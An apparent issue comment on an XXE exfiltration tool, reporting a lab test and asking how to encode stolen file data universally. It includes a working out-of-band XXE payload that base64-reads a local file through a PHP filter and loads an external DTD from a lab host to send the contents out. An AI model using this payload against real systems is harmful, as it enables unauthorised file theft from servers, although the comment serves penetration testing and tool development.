Encode exfil data

[eyosias-k-negash]

Awesome tool. :+1: Tried it against an xxe lab and dtd was fetched from the HTTP server but there was no FTP call. Looking at the PHP error logs the content being appended to the FTP URL is making it fail as it contains spaces, newlines or other invalid characters. I encoded the output and the requesting entity pulled through. But the encoding mechanism is platform agnostic so it limits the tool.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://172.17.0.1:8000/data.dtd"> %dtd;
]>
<data>&send;</data>

Is there a universal way to encode this? Perhaps reading the file with a command and encoding it in a shell?